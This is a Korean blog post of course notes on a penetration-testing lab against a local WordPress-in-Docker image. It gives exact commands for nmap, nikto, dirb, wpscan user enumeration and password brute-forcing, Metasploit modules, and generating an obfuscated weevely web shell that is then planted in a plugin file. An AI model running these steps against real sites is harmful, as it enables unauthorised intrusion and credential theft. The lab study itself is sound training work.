본문 바로가기

Rookies 9기/클라우드 취약점 진단 및 대응 실무

취약점 진단 및 대응 실무 5일차

728x90

•모의해킹 취업을 위해서 

‣ 웹 해킹 기본 공부 (bwapp, dvwa, juice shop..)
 실무하고 비슷한 환경을 구성 공부 (쇼핑물, 워드프레스..)

 Vulnhub, Hack-the-Box 등,,

Web Security Academy: Free Online Training from PortSwigger 웹 해킹하기에 좋음

 

 

•침해대응, 보안담당자

⇒ 가상 인프라 구축 ⇒ 시나리오 모의해킹과 침해대응, 통합관리

 

도커 환경 취약점 분석

1. vmware을 이용하여 ova 이미지 불러오기 (NAT, 4G정도 할당)
2. Nmap을 이용하여 포트 스캔 진행, 최대한 많은 정보 수집
3. Nikto를 이용한 정보 수집
4. dirb를 이용한 디렉터리 정보 수집

도커 ova 실행 화면

원할한 환경을 위해 NAT로 변경, Memory 4GB 변경

docker 환경에 ping 보내기

sudo nmap -sV 192.168.5.135 -p-

-p-  : 모든 포트를 점검해준다.(포트를 지정 안 해주면 nmap에서 정해진 포트만 점검해준다.)

sudo nmap -sV 192.168.5.135 -oX result.xml

xml 파일로 결과 값 저장 

sudo nmap -sV -sC 192.168.5.135 -p-

버전 정보 및 스크립트로 모든 포트 점검

※ nmap -sC = nmap --script=default 

sudo nmap -sV -sC 192.168.5.135 -p-

8000 포트에 Wordpress 4.8.21 가 열려있음

8000포트 확인
nmap srcipt 의 경로
sudo nmap -sV --script=http-enum 192.168.5.135 -p8000

외부에서 접근가능한 디렉터리 및 파일 정보들을 확인

sudo nmap -sV --script=http-wordpress-enum 192.168.5.135 -p8000

Wordpress 설치의 테마와 플러그인을 열거, 스크립트는 버전 번호를 api.wordpress.org에서 가져온 정보와 비교하여 오래된 플러그인을 감지

 

 

•자동취약점 진단을 사용하는 목적

사람이 수동으로 하나씩 접근할 수 있는 한계를 해결
 수동 모의해킹은 전수 진단이라고는 할 수 없음

sudo nikto -h http://192.168.5.128:8000

nikto : 오래된 서버 소프트웨어 및 기타 문제 검색하는 무료 소프트웨어 명령줄 취약점 스캐너

robots.txt : 웹사이트에 웹 크롤러같은 로봇들의 접근을 제어하기 위한 규약

 

 

 

•디렉터리만 검사(사전 파일 무작위 대입)

상태 코드의 결과 값을 보면서 점검을 해주면 된다.(상태 코드가 200 중점으로 접근해준다)

dirb : 기본적으로 웹서버에 대한 사전 기반 공격을 시도하여 응답을 분석하는 방식으로 작동

※ Full Scan = 개발자 서버, 스테이지 서버에 해줘야한다.

 

 

https://github.com/fuzzdb-project/fuzzdb 

 

GitHub - fuzzdb-project/fuzzdb: Dictionary of attack patterns and primitives for black-box application fault injection and resou

Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery. - GitHub - fuzzdb-project/fuzzdb: Dictionary of attack patterns and primitives for bla...

github.com

 

https://github.com/danielmiessler/SecLists

 

GitHub - danielmiessler/SecLists: SecLists is the security tester's companion. It's a collection of multiple types of lists used

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, ...

github.com

 

워드프레스에 관한 스캔 점검

sudo wpscan --url http://192.168.5.135:8000/

wpscan : 워드프레스 취약점 DB를 API를 받아와 wordpress 사이트를 스캐닝하며 점검

sudo wpscan --url http://192.168.5.135:8000/ --enumerate p

Wordpress 플로그만 검사

sudo wpscan --url http://192.168.5.135:8000/ --enumerate u

Wordpress의 사용자 정보 검사

wpscan --url http://192.168.5.128:8000/ --enumerate u 명령으로 사용자 bob을 찾음 

bob에 있는 URL로 접속

 https://github.com/danielmiessler/SecLists.git  설치를 해준다. 사전 파일이 있는 경로 위치

sudo wpscan --url http://192.168.5.135:8000/ --usernames bob --passwords /home/kali/SecLists/Passwords/Common-Credential/10-million-password-list-top-10000.txt

wpscan를 사용하여 패스워드 사전 파일 공격

Welcome1 패스워드 획득

로그인 시도
로그인 결과 화면

• Msfconsole 사용

msfconsole에 들어가 xmlrpc 취약점 페이로드를 찾음

xmlrpc 페이로드 설정
xmlrpc 페이로드 결과 화면

•워드프레스 취약점

- 제일 많이 나오는 취약점은 플러그인 취약점
- 플로그인 취약점이 외부에서 공격할 수 있다면 WEB을 통해 공격하면 된다.
- 권한을 획득 한 (관리자 권한) 후에 공격할 수 있는 것을 검색할 필요

 

시나리오

1. 백도어 웹쉘을 생성 - 칼리리눅스와 바로 연결할 수 있는 백도어 제작(msfveom, weevely)
2.플로그인 취약점에 웹쉘을 올린다 -> 공격자 서버

sudo weevely generate hacker shell.php

백도어 웹쉘 생성

cat shell.php

QM이 중간에 있어 문자가 안 보이게 난독화 함

취약한 플로그인
웹쉘 올리기 전 hello.php
웹쉘 올리기 후 hello.php

웹쉘을 업로드했으면 weevely로 백도어 실행

docker 안에 있다

docker 컨테이너 안에 있는 걸 알 수 있다. (명령어가 제한된 이유)

cgroup : 프로세스들의 자원의 사용을 제한하고 격리시키는 리눅스 커널 기능

tmp 폴더는 권한이 자유로움

 

‣ nmap 올리기

file_upload /home/kali/Download/nmap /tmp/nmap
nmap를 실행 시킬수 있다.
nmap 사용

‣ ifconfig 올리기

ifconfig

‣ netstat 올리기

netstat

• wp_admin취약점 (msfconsole 사용, ID/PW 알고 있어야 함)

serach wp_admin
페이로드 설정
세션이 연결됨

 

※ 공부 팁

혼자 공부하는 방법

자기 자신 IP를 점검을 하고 로그를 분석을 한다.

 

•SQLMap 실습

-v 옵션을 사용하여 페이로드를 자세히 볼 수 있음

 

•자동 진단 취약점

Acunetix Web Vulnerability Scanner - Test websites (vulnweb.com) 실습

arachni-scanner

Home - Arachni - Web Application Security Scanner Framework (arachni-scanner.com) 설치

arachni-scanner

testphp.vulnweb.com 대상으로 취약점 스캔

취약점 확인